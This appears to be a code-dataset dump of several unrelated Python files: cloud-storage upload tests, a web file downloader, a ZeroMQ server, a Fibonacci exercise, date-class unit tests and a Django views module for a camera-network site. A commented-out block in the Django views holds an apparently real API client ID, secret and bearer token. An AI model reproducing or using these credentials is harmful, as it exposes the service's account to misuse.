file_dir=os.path.dirname(path_parquet),\r\n s3_key=s3_key,\r\n bucket=bucket,\r\n )\r\n s3_csv = S3(\r\n file_name=os.path.basename(path_csv),\r\n file_dir=os.path.dirname(path_csv),\r\n s3_key=s3_key,\r\n bucket=bucket,\r\n )\r\n\r\n qf.to_parquet(path_parquet)\r\n s3_parquet.from_file(keep_file=False)\r\n s3_parquet.to_rds(dsn=\"redshift_acoe\", table=table_parquet, schema=schema, if_exists=\"replace\")\r\n qf_parquet = QFrame(dsn=\"redshift_acoe\").from_table(table=table_parquet, schema=schema)\r\n assert len(qf_parquet) == 30\r\n\r\n qf.to_csv(path_csv)\r\n s3_csv.from_file(keep_file=False)\r\n s3_csv.to_rds(dsn=\"redshift_acoe\", table=table_csv, schema=schema, if_exists=\"replace\")\r\n qf_csv = QFrame(dsn=\"redshift_acoe\").from_table(table=table_csv, schema=schema)\r\n assert len(qf_csv) == 30\r\n\r\n 
qf.to_parquet(path_parquet)\r\n s3_parquet.from_file(keep_file=False)\r\n s3_parquet.to_rds(dsn=\"redshift_acoe\", table=table_parquet, schema=schema, if_exists=\"append\")\r\n assert len(qf_parquet) == 60\r\n\r\n qf.rearrange(\r\n [\r\n \"composer\",\r\n \"milliseconds\",\r\n \"bytes\",\r\n \"unit_price\",\r\n \"like_it\",\r\n \"spare_column\",\r\n \"track_id\",\r\n \"name\",\r\n \"album_id\",\r\n \"media_type_id\",\r\n \"genre_id\",\r\n ]\r\n )\r\n qf.to_csv(path_csv)\r\n s3_csv.from_file(keep_file=False)\r\n s3_csv.to_rds(dsn=\"redshift_acoe\", table=table_csv, schema=schema, if_exists=\"append\")\r\n assert len(qf_csv) == 60\r\n\r\n qf_csv.distinct()\r\n assert len(qf_csv) == 30\r\n\r\n source = Source(dsn=\"redshift_acoe\")\r\n source.drop_table(table=table_parquet, schema=schema)\r\n source.drop_table(table=table_csv, schema=schema)\r\n\r\n\r\ndef test_to_aurora():\r\n\r\n dsn = get_path(\"grizly_dev\", \"tests\", \"Chinook.sqlite\")\r\n qf = QFrame(dsn=dsn, db=\"sqlite\", dialect=\"mysql\").from_table(table=\"Track\")\r\n\r\n qf.window(offset=100, limit=30, order_by=[\"TrackId\"])\r\n\r\n qf.assign(LikeIt=\"CASE WHEN GenreId = 5 THEN 1 ELSE 0 END\", custom_type=\"BOOL\")\r\n qf.assign(SpareColumn=\"NULL\")\r\n\r\n qf.rename(\r\n {\r\n field: \"_\".join(re.findall(\"[A-Z][^A-Z]*\", alias)).lower()\r\n for field, alias in zip(qf.get_fields(aliased=False), qf.get_fields(aliased=True))\r\n }\r\n )\r\n\r\n s3_key = \"test/\"\r\n bucket = \"acoe-s3\"\r\n table_csv = \"grizly_test_csv\"\r\n schema = \"sandbox\"\r\n path_csv = get_path(\"grizly_test.csv\")\r\n\r\n s3_csv = S3(\r\n file_name=os.path.basename(path_csv),\r\n file_dir=os.path.dirname(path_csv),\r\n s3_key=s3_key,\r\n bucket=bucket,\r\n )\r\n\r\n qf.to_csv(path_csv)\r\n s3_csv.from_file(keep_file=False)\r\n s3_csv.to_aurora(table=table_csv, schema=schema, dsn=\"aurora_db\", if_exists=\"replace\")\r\n qf_csv = QFrame(dsn=\"aurora_db\").from_table(table=table_csv, schema=schema)\r\n assert len(qf_csv) == 30\r\n\r\n qf.rearrange(\r\n [\r\n \"composer\",\r\n \"milliseconds\",\r\n \"bytes\",\r\n \"unit_price\",\r\n \"like_it\",\r\n \"spare_column\",\r\n \"track_id\",\r\n \"name\",\r\n \"album_id\",\r\n \"media_type_id\",\r\n \"genre_id\",\r\n ]\r\n )\r\n qf.to_csv(path_csv)\r\n s3_csv.from_file(keep_file=False)\r\n s3_csv.to_aurora(table=table_csv, schema=schema, dsn=\"aurora_db\", if_exists=\"append\")\r\n assert len(qf_csv) == 60\r\n\r\n qf_csv.distinct()\r\n assert len(qf_csv) == 30\r\n\r\n Source(dsn=\"aurora_db\").drop_table(table=table_csv, schema=schema)\r\n\r\n\r\ndef test_to_serializable():\r\n s3 = S3(bucket=\"acoe-s3\", s3_key=\"test/\", file_name=\"test_s3.json\")\r\n serializable = s3.to_serializable()\r\n assert serializable == {\"a\": 42}\r\n\r\n\r\n# This will fail because of DataFrame replacing empty strings with NaN values\r\n# (lists(text() will generate a list of empty strings) - Michal\r\n# @pytest.mark.parametrize(\"ext\", [\"csv\", \"parquet\", \"xlsx\"])\r\n# @given(col1=lists(text(), min_size=3, max_size=3), col2=lists(integers(), min_size=3, max_size=3))\r\n# def test_from_df_to_df(col1, col2, ext):\r\n# d = {\"col1\": col1, \"col2\": col2}\r\n# df = DataFrame(data=d)\r\n# s3 = S3(f\"test.{ext}\", s3_key=\"grizly/\")\r\n# s3.from_df(df)\r\n# test_df = s3.to_df()\r\n# assert test_df.equals(df)\r\n","sub_path":"tests/test_s3.py","file_name":"test_s3.py","file_ext":"py","file_size_in_byte":6302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} 
+{"seq_id":"164260500","text":"\"\"\"\nfiledownloader.py is a simple script to download all files of a certain type\n(e.g. pdf) from a web directory\n\ninput - target_directory, ftype, archive_url\nouput - all the files in that directory\n\"\"\"\n\nimport sys\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_file_links(ftype, archive_url):\n\n # create response object\n r = requests.get(archive_url)\n\n # create beautiful-soup object\n soup = BeautifulSoup(r.content, \"html5lib\")\n\n # find all links on web-page\n links = soup.findAll(\"a\")\n\n # filter the link sending with file type\n # specified by ftype (i.e. .pdf, .mp4 etc.)\n file_links = [\n archive_url + link[\"href\"] for link in links if link[\"href\"].endswith(ftype)\n ]\n\n return file_links\n\n\ndef download_files(file_links):\n\n for link in file_links:\n\n \"\"\"iterate through all links in file_links\n and download them one by one\"\"\"\n\n # obtain filename by splitting url and getting\n # last string\n file_name = link.split(\"/\")[-1]\n\n print(\"Downloading file:%s\" % file_name)\n\n # create response object\n r = requests.get(link, stream=True)\n\n # download started\n with open(file_name, \"wb\") as f:\n for chunk in r.iter_content(chunk_size=1024 * 1024):\n if chunk:\n f.write(chunk)\n\n print(\"%s downloaded!\\n\" % file_name)\n\n print(\"All files downloaded!\")\n return\n\n\ndef main():\n target_directory = sys.argv[1]\n os.chdir(target_directory)\n ftype = sys.argv[2]\n archive_url = sys.argv[3]\n file_links = get_file_links(ftype, archive_url)\n os.chdir(target_directory)\n download_files(file_links)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"file_downloader.py","file_name":"file_downloader.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"589113915","text":"import datetime\nimport zmq\n\n# Socket to talk to clients.\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind(\"tcp://*:5555\")\n\n# Server thread loop.\nwhile True:\n # Blocking call.\n # Wait for next request from client.\n message = socket.recv()\n\n # Get current time on client request.\n time = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # Send reply back to client.\n socket.send(time.encode('UTF-8'))\n\n# Clean up.\nsocket.close()\ncontext.term()\n","sub_path":"demo_01/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"536582732","text":"# La secuencia de Fibonacci es una función matemática que se define recursivamente.\n# En el año 1202, el matemático italiano Leonardo de Pisa, también conocido como Fibonacci, \n# encontró una fórmula para cuantificar el crecimiento que ciertas poblaciones experimentan.\n\n# Imagina que una pareja de conejos nace, un macho y una hembra, y luego son liberados.\n# Imagina, también, que los conejos se pueden reproducir hasta la edad de un mes y que tienen un periodo de gestación también de un mes.\n# Por último imagina que estos conejos nunca mueren y que la hembra siempre es capaz de producir una nueva pareja (un macho y una hembra).\n# ¿Cuántos conejos existirán al final de seis meses?\n\ndef fibonacci(n):\n if n == 0 or n == 1:\n return 1\n\n return fibonacci(n - 1) + fibonacci(n - 2)\n\nn = int(input('Ingrese un cantidad de meses'))\n\nprint(f'{fibonacci(n)} Conejos al final de {n} 
months')","sub_path":"25_fibonnacci.py","file_name":"25_fibonnacci.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"308778753","text":"from date import Date, TimeDelta\nimport unittest\n\n\nclass MyTestCase(unittest.TestCase):\n\n    def test_init(self):\n        for i in (-1, 1, 32):\n            date = i\n            for j in (-1, 1, 13):\n                month = j\n                for k in (0, 1):\n                    if i == 1 and j == 1 and k == 1:\n                        pass\n                    else:\n                        year = k\n                        with self.assertRaises(ValueError):\n                            some_date = Date(date, month, year)\n        date1, month1, year1 = 1, 1, 1\n        with self.assertRaises(ValueError):\n            Date(date1, month1)\n        with self.assertRaises(ValueError):\n            Date(\"2.2\")\n        self.assertEqual(str(Date(\"2.2.2\")), \"02.02.0002\")\n\n    def test_repr(self):\n        date = 1\n        month = 1\n        year = 1\n        test_date = Date(date, month, year)\n        test_timedelta = TimeDelta(date, month, year)\n        self.assertEqual(test_date.__repr__(), f\"Date({date}, {month}, {year})\", \"Should be 'Date(1, 1, 1)'\")\n        self.assertEqual(test_timedelta.__repr__(), f\"TimeDelta({date},\"\n                                                   f\" {month}, {year})\", \"Should be 'TimeDelta(1, 1, 1)'\")\n\n    def test_str(self):\n        day, month, year = 1, 1, 1\n        test_date = Date(day, month, year)\n        test_timedelta = TimeDelta(day, month, year)\n        self.assertEqual(str(test_date), \"01.01.0001\")\n        self.assertEqual(str(test_timedelta), f'{day} day(s), {month} month(s), {year} year(s)')\n        day, month, year = 11, 1, 1\n        test_date = Date(day, month, year)\n        test_timedelta = TimeDelta(day, month, year)\n        self.assertEqual(str(test_date), \"11.01.0001\")\n        self.assertEqual(str(test_timedelta), f'{day} day(s), {month} month(s), {year} year(s)')\n        day, month, year = 11, 11, 1\n        test_date = Date(day, month, year)\n        test_timedelta = TimeDelta(day, month, year)\n        self.assertEqual(str(test_date), \"11.11.0001\")\n        self.assertEqual(str(test_timedelta), f'{day} day(s), {month} month(s), {year} year(s)')\n        day, month, year = 11, 11, 11\n        test_date = Date(day, month, year)\n        test_timedelta = TimeDelta(day, month, year)\n        self.assertEqual(str(test_date), \"11.11.0011\")\n        self.assertEqual(str(test_timedelta), f'{day} day(s), {month} month(s), {year} year(s)')\n        year = 111\n        test_date = Date(day, month, year)\n        test_timedelta = TimeDelta(day, month, year)\n        self.assertEqual(str(test_date), \"11.11.0111\")\n        self.assertEqual(str(test_timedelta), f'{day} day(s), {month} month(s), {year} year(s)')\n        year = 1111\n        test_date = Date(day, month, year)\n        test_timedelta = TimeDelta(day, month, year)\n        self.assertEqual(str(test_date), \"11.11.1111\")\n        self.assertEqual(str(test_timedelta), f'{day} day(s), {month} month(s), {year} year(s)')\n\n    def test_is_leap_year(self):\n        answers = []\n        for year in (1, 100, 400, 1000, 2001):\n            test_date = Date(11, 11, year)\n            answers.append(test_date.is_leap_year(year))\n        self.assertEqual(answers, [False, False, True, False, False])\n        with self.assertRaises(ValueError):\n            test_date.is_leap_year(\"f\")\n\n    def test_get_max_days(self):\n        j = 1\n        for i in (31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31):\n            test_date = Date(11, j, 400)\n            self.assertEqual(test_date.get_max_day(test_date.month, test_date.year), i)\n            j += 1\n        j = 1\n        for i in (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31):\n            test_date = Date(11, j, 401)\n            self.assertEqual(test_date.get_max_day(test_date.month, test_date.year), i)\n            j += 1\n\n    def test_is_valid_date(self):\n        with self.assertRaises(ValueError):\n            Date(29, 2, 401)\n\n    def test_setters(self):\n        test_date = Date(11, 11, 
1111)\n        test_date.day = 12\n        test_date.month = 12\n        test_date.year = 1112\n        test_date = Date(1, 1, 1)\n\n    def test_setters_incorrect(self):\n        test_date = Date(1, 1, 1)\n        with self.assertRaises(ValueError):\n            test_date.day = 32\n        with self.assertRaises(ValueError):\n            test_date.month = 13\n        with self.assertRaises(ValueError):\n            test_date.year = 0\n\n    def test_sub(self):\n        test_date1 = Date(11, 11, 1111)\n        test_date2 = Date(12, 12, 1112)\n        self.assertEqual(test_date1 - test_date2, -398)\n        test_date2 = Date(12, 12, 400)\n        self.assertEqual(test_date1 - test_date2, 259654)\n\n    def test_sub_incorrect(self):\n        test_date1 = Date(11, 11, 1111)\n        test_date2 = \"OLOLO\"\n        res = test_date1.__sub__(test_date2)\n        self.assertEqual(res, NotImplemented)\n\n    def test_add(self):\n        test_date = Date(11, 11, 1111)\n        timedelta = TimeDelta(1, 1, 1)\n        summ = test_date + timedelta\n        self.assertEqual(str(summ), \"12.12.1112\")\n        test_date = Date(28, 2, 400)\n        timedelta = TimeDelta(2, 11, 400)\n        summ = test_date + timedelta\n        self.assertEqual(str(summ), \"01.02.0801\")\n        test_date = Date(1, 10, 1)\n        timedelta = TimeDelta(30, 1, 0)\n        summ = test_date + timedelta\n        self.assertEqual(str(summ), \"01.12.0001\")\n\n    def test_iadd(self):\n        test_date = Date(11, 11, 1111)\n        timedelta = TimeDelta(1, 1, 1)\n        test_date += timedelta\n        self.assertEqual(str(test_date), \"12.12.1112\")\n        test_date = Date(28, 2, 400)\n        timedelta = TimeDelta(2, 9, 400)\n        test_date += timedelta\n        self.assertEqual(str(test_date), \"01.12.0800\")\n        test_date = Date(31, 12, 400)\n        timedelta = TimeDelta(1, 0, 0)\n        test_date += timedelta\n        self.assertEqual(str(test_date), \"01.01.0401\")\n\n\nif __name__ == '__main__':\n    unittest.main(verbosity=2)\n","sub_path":"tests/test_unittest.py","file_name":"test_unittest.py","file_ext":"py","file_size_in_byte":5922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"130820953","text":"import os\nimport json\nimport urllib.parse\nimport urllib.request\nimport sys\nimport requests\nimport datetime\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.contrib.auth import login, update_session_auth_hash\nfrom django.contrib import messages\nfrom django.conf import settings\nfrom django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom social_django.models import UserSocialAuth\nfrom django.utils.encoding import force_text, force_bytes\nfrom django.utils.http import urlsafe_base64_decode, urlsafe_base64_encode\nfrom .tokens import 
account_activation_token\nfrom .forms import RegistrationForm, AdditionalForm, AppForm, ProfileEmailForm, NameForm, ReportForm\nfrom django.contrib.auth.models import User\nfrom django.core.mail import mail_admins, send_mail\nfrom .models import Homepage, FAQ, History, Publication, Team, Leader, TeamMember, CAM2dbApi, RegisterUser, Collab, Location, Sponsor, Poster, ReportedCamera, Calendar, Video, Subteam, Member\nfrom django.http import HttpResponseNotFound\nfrom cam2webui.settings import EMAIL_HOST_USER, MANAGER_EMAIL\nimport logging\n\n# Get an instance of a logger\nlogger = logging.getLogger(__name__)\n\n\ndef index(request):\n slide = Homepage.objects.reverse()\n context = {'slide_list': slide}\n return render(request, 'app/index.html', context)\n\ndef cameras(request):\n# context = {'google_api_key': settings.GOOGLE_API_KEY,\n# 'google_client_id': settings.GOOGLE_CLIENT_ID}\n if request.method == 'POST':\n form = ReportForm(request.POST)\n if form.is_valid():\n #recaptcha_response = request.POST.get('g-recaptcha-response')\n #url = 'https://www.google.com/recaptcha/api/siteverify'\n #values = {\n # 'secret': settings.GOOGLE_RECAPTCHA_SECRET_KEY,\n # 'response': recaptcha_response\n #}\n #data = urllib.parse.urlencode(values).encode()\n #req = urllib.request.Request(url, data=data)\n #response = urllib.request.urlopen(req)\n #result = json.loads(response.read().decode())\n #if result['success']:\n\n #get info from form\n camID = form.cleaned_data['cameraID']\n #add info to email template\n #content = render_to_string('app/cam_report_email_template.html', {\n # 'cameraID': camID,\n #})\n #send_mail(\"Camera with Unavailable Image Reported\", content, EMAIL_HOST_USER, [MANAGER_EMAIL])#email admin\n #check for existing reported camera\n camidlist = ReportedCamera.objects.reverse().values_list(\"cameraID\", flat=True)\n user = None\n if (request.user.is_authenticated):\n user = request.user.username\n\n if camID not in camidlist:\n #add info to admin database - using cleaned_data\n\n\n cam_obj = ReportedCamera(username=user, cameraID=camID, reporttime=datetime.datetime.now())\n cam_obj.save()\n\n else:\n cams = ReportedCamera.objects.filter(cameraID__exact=camID)\n logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n logging.debug('This is the user : ' + str(cams))\n if(cams):\n for c in cams:\n if (not user in str(c.username)):\n c.username = str(c.username) + ', ' + user\n c.save()\n\n\n #return redirect('email_sent')\n form = ReportForm()\n messages.success(request, 'The unavailable image has been reported. Thank you!')\n\n\n\n else:\n form = ReportForm()\n\n return render(request, \"app/cameras.html\", {'form': form})\n #return render(request, 'app/cameras.html')\n\ndef good_cameras(request):\n return render(request, 'app/good_cameras.html')\n\ndef team(request):\n \"\"\"Renders content for the Team page\n\n Retrieves information from the Team database using the matching Django Model structure.\n\n Args:\n request: the HttpRequest corresponding to the page to be accessed.\n\n Returns:\n A render that displays the page team.html, complete with information from the Team database. 
\"\"\"\n \n team_list = Team.objects.reverse()\n leader_list = Leader.objects.reverse()\n curmember_list = Member.objects.filter(iscurrentmember=True).order_by(\"membername\")\n oldmember_list = TeamMember.objects.filter(iscurrentmember=False).order_by(\"name\")\n director_list = TeamMember.objects.filter(isdirector=True).order_by(\"name\")\n subteam = Subteam.objects.all()\n members = TeamMember.objects.all()\n \n # Sub team\n image_list = Member.objects.filter(subteam__exact='I').order_by(\"membername\")\n webui_list = Member.objects.filter(subteam__exact='UI').order_by(\"membername\")\n api_list = Member.objects.filter(subteam__exact='D+API').order_by(\"membername\")\n parallel_list = Member.objects.filter(subteam__exact='PP').order_by(\"membername\")\n resource_list = Member.objects.filter(subteam__exact='RM').order_by(\"membername\")\n software_list = Member.objects.filter(subteam__exact='SE').order_by(\"membername\")\n mobile_list = Member.objects.filter(subteam__exact='MA').order_by(\"membername\")\n cameraRelia_list = Member.objects.filter(subteam__exact='CR').order_by(\"membername\")\n cameraDisco_list = Member.objects.filter(subteam__exact='CD').order_by(\"membername\")\n transfer_list = Member.objects.filter(subteam__exact='TL').order_by(\"membername\")\n activeTraining_list = Member.objects.filter(subteam__exact='AT').order_by(\"membername\")\n imageData_list = Member.objects.filter(subteam__exact='ID').order_by(\"membername\")\n drone_list = Member.objects.filter(subteam__exact='DV').order_by(\"membername\")\n forest_list = Member.objects.filter(subteam__exact='FIA').order_by(\"membername\")\n human_list = Member.objects.filter(subteam__exact='HB').order_by(\"membername\")\n crowd_list = Member.objects.filter(subteam__exact='CS').order_by(\"membername\")\n intel_list = Member.objects.filter(subteam__exact='Intel').order_by(\"membername\")\n active_list = Member.objects.filter(subteam__exact='').filter(iscurrentmember=True).order_by(\"membername\") \n\n context = {\n \"team_list\": team_list,\n \"leader_list\": leader_list,\n \"curmember_list\": curmember_list,\n \"oldmember_list\": oldmember_list,\n \"image_list\": image_list,\n \"api_list\": api_list,\n \"webui_list\": webui_list,\n \"parallel_list\": parallel_list,\n \"resource_list\": resource_list,\n \"software_list\": software_list,\n \"mobile_list\": mobile_list,\n \"cameraRelia_list\": cameraRelia_list,\n \"cameraDisco_list\": cameraDisco_list,\n \"transfer_list\": transfer_list,\n \"activeTraining_list\": activeTraining_list,\n \"imageData_list\": imageData_list,\n \"drone_list\": drone_list,\n \"forest_list\": forest_list,\n \"human_list\": human_list,\n \"crowd_list\": crowd_list,\n \"intel_list\": intel_list,\n 'subteams_list': subteam,\n \"members_list\": members,\n \"director_list\": director_list,\n \"active_list\": active_list\n } \n return render(request, 'app/team.html', context) \n\n\"\"\"def team(request):\n team_list = Team.objects.reverse()\n leader_list = Leader.objects.reverse()\n oldmember_list = TeamMember.objects.filter(iscurrentmember=False).order_by(\"name\")\n director_list = TeamMember.objects.filter(isdirector=True).order_by(\"name\")\n subteam = Subteam.objects.all()\n members = TeamMember.objects.all()\n context = {'subteams_list': subteam, \"team_list\": team_list,\"leader_list\": leader_list, \"members_list\": members, \"oldmember_list\": oldmember_list, \"director_list\": director_list}\n return render(request, 'app/team.html', context)\"\"\"\n\ndef team_poster(request):\n poster_images = 
Poster.objects.reverse()\n context = {\"poster_images\": poster_images}\n return render(request, 'app/team_poster.html', context)\n\ndef training(request):\n\treturn render(request, 'app/training.html')\n\ndef privacy(request):\n return render(request, 'app/privacy.html')\n\ndef terms(request):\n return render(request, 'app/terms.html')\n\ndef acknowledgement(request):\n return render(request, 'app/ack.html')\n\ndef collaborators(request):\n collab = Collab.objects.reverse()\n context = {'collab_list': collab}\n return render(request, 'app/collaborators.html', context)\n\ndef sponsors(request):\n sponsor = Sponsor.objects.reverse()\n context = {'sponsor_list': sponsor}\n return render(request, 'app/sponsors.html', context)\n\ndef calendar(request):\n cal = Calendar.objects.reverse()\n context = {'calendar_list': cal}\n return render(request, 'app/calendar.html', context)\n\ndef location(request):\n loc = Location.objects.reverse()\n context = {'loc_list': loc}\n return render(request, 'app/location.html', context)\n\n#Addition for Testimony Video\ndef testimony_vid1(request):\n\treturn render(request, 'app/testimony_vid.html')\n#def contact(request):\n# return render(request, 'app/contact.html')\n\ndef faqs(request):\n \"\"\"Renders content for the FAQs page\n\n Retrieves information from the FAQ database using the matching Django Model structure.\n\n Args:\n request: the HttpRequest corresponding to the page to be accessed.\n\n Returns:\n A render that displays the page faq.html, complete with information from the FAQs database.\n \"\"\"\n question_list = FAQ.objects.reverse()\n context = {'question_list': question_list}\n return render(request, 'app/faq.html', context)\n\ndef history(request):\n \"\"\"Renders content for the History page\n\n Retrieves information from the History database using the matching Django Model structure.\n\n Args:\n request: the HttpRequest corresponding to the page to be accessed.\n\n Returns:\n A render that displays the page history.html, complete with information from the History database.\n \"\"\"\n history_list = History.objects.order_by('-year', '-month')\n context = {'history_list': history_list}\n return render(request, 'app/history.html', context)\n\ndef publications(request):\n \"\"\"Renders content for the Publications page\n\n Retrieves information from the Publications database using the matching Django Model structure.\n\n Args:\n request: the HttpRequest corresponding to the page to be accessed.\n\n Returns:\n A render that displays the page publications.html, complete with information from the Publications database.\n \"\"\"\n publication_list = Publication.objects.reverse()\n paginator = Paginator(publication_list, 6)\n page = request.GET.get('page')\n\n try:\n publication_paginator = paginator.page(page)\n except PageNotAnInteger:\n publication_paginator = paginator.page(1)\n except EmptyPage:\n publication_paginator = paginator.page(paginator.num_pages)\n\n\n index = publication_paginator.number - 1\n max_index = len(paginator.page_range)\n start_index = index - 5 if index >= 5 else 0\n end_index = index + 5 if index <= max_index - 5 else max_index\n page_range = paginator.page_range[start_index:end_index]\n\n context = {'publication_list': publication_paginator, 'page_range':page_range}\n return render(request, 'app/publications.html', context)\n\ndef new_map(request):\n #client = '34b9eb8afc032098bc96174ec38ca2dba940a401d03c311251af4d8b609f7272c91ed0aaef1ee4eddb4783bcaa3ead7d'\n #secret = 
'b0eaea176c29331149557b1c2fe54b82d335c8c30dbed9a50c5e4aa141b15dbefbbfd69'\n #header = {'Authorization': 'Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjbGllbnRJRCI6IjM0YjllYjhhZmMwMzIwOThiYzk2MTc0ZWMzOGNhMmRiYTk0MGE0MDFkMDNjMzExMjUxYWY0ZDhiNjA5ZjcyNzJjOTFlZDBhYWVmMWVlNGVkZGI0NzgzYmNhYTNlYWQ3ZCIsInBlcm1pc3Npb25MZXZlbCI6InVzZXIiLCJpYXQiOjE1MjgxMjkxNTAsImV4cCI6MTUyODEyOTQ1MH0.xaTv3iT7KJKoQlgZrlpm0d4RuhWjniL5QG6K_RqUWVQ'}\n #params = {'clientID': client, 'clientSecret': secret}\n #rauth = requests.get('https://cam2-api.herokuapp.com/auth', params=params)\n #token = rauth.json()['token']\n #headerval = 'Bearer ' + token\n #header = {'Authorization': headerval}\n #r = requests.get('https://cam2-api.herokuapp.com/cameras/search', headers=header)\n #datalen = len(r.json())\n #data = r.json()\n with open('app/cam_data.json') as f:\n data = json.load(f)\n return render(request, 'app/new_map.html', {'data': data})\n\ndef good_map(request):\n with open('app/cam_data.json') as f:\n data = json.load(f)\n return render(request, 'app/new_map_good.html', {'data': data})\n\ndef advice(request):\n return render(request, 'app/advice.html')\n\ndef register(request):\n \"\"\"Renders content for the Registration form page\n\n Uses the Django Forms structure outlined in forms.py to create a form for users to use\n to register their information. When the user submits this form, it validates it to ensure\n that the values are acceptable and that the required fields were filled, then it stores\n the contents of the form into the Django Admin database for Users. Once this is complete,\n an email is sent to the provided email address that contains an activation link for the user\n to click.\n\n Args:\n request: the HttpRequest corresponding to the page to be accessed or the submitted form.\n\n Returns:\n A render that displays the form page if the page was just accessed or the form was invalid,\n or a redirection to a page that confirms that the account was registered.\n \"\"\"\n if request.method == 'POST':\n form1 = RegistrationForm(request.POST)\n form2 = AdditionalForm(request.POST)\n\n\n if form1.is_valid() and form2.is_valid():\n\n recaptcha_response = request.POST.get('g-recaptcha-response')\n url = 'https://www.google.com/recaptcha/api/siteverify'\n values = {\n 'secret': settings.GOOGLE_RECAPTCHA_SECRET_KEY,\n 'response': recaptcha_response\n }\n data = urllib.parse.urlencode(values).encode()\n req = urllib.request.Request(url, data=data)\n response = urllib.request.urlopen(req)\n result = json.loads(response.read().decode())\n if result['success']:\n model1 = form1.save(commit=False) #Required information of user\n model1.is_active = False #Set true for testing without email.\n model1.save()\n model2 = form2.save(commit=False) #Optional information of user\n model2.user = model1\n model2.save()\n\n #Email user\n current_site = get_current_site(request)\n subject = 'Activate Your CAM2 Account'\n message = render_to_string('app/confirmation_email.html', {\n 'user': model1,\n 'domain': current_site.domain,\n 'uid': urlsafe_base64_encode(force_bytes(model1.pk)).decode(),\n 'token': account_activation_token.make_token(model1),\n })\n model1.email_user(subject, message)\n\n return redirect('email_confirmation_sent')\n else:\n messages.error(request, 'Invalid reCAPTCHA. 
Please confirm you are not a robot and try again.')\n                if 'test' in sys.argv:\n                    sitekey = os.environ['RECAPTCHA_TEST_SITE_KEY']\n                else:\n                    sitekey = os.environ['RECAPTCHA_SITE_KEY']\n        else:\n            if 'test' in sys.argv:\n                sitekey = os.environ['RECAPTCHA_TEST_SITE_KEY']\n            else:\n                sitekey = os.environ['RECAPTCHA_SITE_KEY']\n    else:\n        form1 = RegistrationForm()\n        form2 = AdditionalForm()\n        if 'test' in sys.argv:\n            sitekey = os.environ['RECAPTCHA_TEST_SITE_KEY']\n        else:\n            sitekey = os.environ['RECAPTCHA_SITE_KEY']\n\n    return render(request, 'app/register.html', {'form1': form1, 'form2': form2, 'sitekey': sitekey})\n\ndef email_confirmation_sent(request):\n    return render(request, 'app/email_confirmation_sent.html')\n\ndef email_confirmation_invalid(request):\n    return render(request, 'app/email_confirmation_invalid.html')\n\ndef account_activated(request):\n    return render(request, 'app/account_activated.html')\n\ndef activate(request, uidb64, token):\n    \"\"\"Renders content for account activation\n\n    Determines which user is attempting to activate their account based on the encoded section of the\n    URL used to access the page, sets the user's account to an activated state and saves the change\n    to the database, emails the system administrator about the newly registered account, logs the user\n    in, and redirects them to the site.\n\n    Args:\n        request: the HttpRequest corresponding to the page to be accessed.\n        uidb64: an encoded form of the user id used in activation.\n        token: the access token for activation given by the activation link.\n\n    Returns:\n        Either a redirection to the site indicating successful confirmation, or a rendering of a page\n        that indicates a failure to activate the account.\n    \"\"\"\n    \"\"\"Followed tutorial: https://simpleisbetterthancomplex.com/tutorial/2017/02/18/how-to-create-user-sign-up-view.html\"\"\"\n    try:\n        uid = force_text(urlsafe_base64_decode(uidb64))\n        user = User.objects.get(pk=uid)\n    except (TypeError, ValueError, OverflowError, User.DoesNotExist):\n        user = None\n\n    if user is not None and account_activation_token.check_token(user, token):\n        user.is_active = True\n        user.registeruser.email_confirmed = True\n        user.save()\n\n        optional = RegisterUser.objects.get(user=user) #get optional info of user\n        #email admin\n        admin_subject = 'New User Registered'\n        admin_message = render_to_string('app/new_user_email_to_admin.html', {\n            'user': user,\n            'optional': optional,\n        })\n\n\n        mail_admins(admin_subject, admin_message)\n        login(request, user, backend=\"django.contrib.auth.backends.ModelBackend\")\n        return redirect('account_activated')\n    else:\n        return render(request, 'app/email_confirmation_invalid.html')\n\n@login_required\ndef profile(request):\n    \"\"\"Renders content for the Profile page\n\n    For a user that's currently logged in, displays information currently stored in the database\n    for that user (First Name, Last Name, email, etc...), and allows the User to modify that\n    information using a form.\n\n    Also pulls information provided by Github sign-in, if Github authentication was used to access\n    the site.\n\n    Args:\n        request: the HttpRequest corresponding to the page to be accessed.\n\n    Returns:\n        A render that displays the user's profile page, complete with all information accessible from the\n        Django admin database for that specific user.\n    \"\"\"\n    user = request.user\n    try:\n        github_login = user.social_auth.get(provider='github')\n    except UserSocialAuth.DoesNotExist:\n        github_login = None\n\n    #initialize forms\n    app_form = AppForm()\n    apps = 
